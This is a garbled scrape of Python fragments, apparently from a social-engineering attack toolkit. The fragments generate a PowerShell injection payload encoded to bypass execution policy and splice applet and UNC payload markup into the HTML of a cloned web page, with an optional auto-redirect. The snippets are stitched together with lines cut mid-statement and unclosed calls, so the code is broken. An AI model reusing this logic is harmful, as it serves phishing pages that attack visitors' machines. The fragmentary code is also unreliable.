    with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite:
    core.print_status("Finished generating powershell injection bypass.")
    core.print_status("Encoded to bypass execution restriction policy...")
Ejemplo n.º 11
                                            unc_database + "\n</body>",
                if not match:
                    index_database = re.sub("<head.*?>",
                                            "\n<head>" + unc_database,

            counter = 0
            # confirm we can find body
            match = re.search("</body.*?>", index_database)
            if match:
                counter = 1
                index_database = re.sub("</body.*?>",
                                        applet_database + "\n</body>",
                check_redirect = core.check_config("AUTO_REDIRECT=")
                if check_redirect.lower() == "on":
                    index_database = index_database.replace(
                        '<param name="nextPage" value=""',
                        '<param name="nextPage" value="%s"' % (url))
            if not match:
                match = re.search("<head.*?>", index_database)
                if match:
                    counter = 1
                    index_database = re.sub("<head.*?>",
                                            "\n<head>" + applet_database,
                    check_redirect = core.check_config("AUTO_REDIRECT=")
                    if check_redirect.lower() == "on":
                        index_database = index_database.replace(
                            '<param name="nextPage" value=""',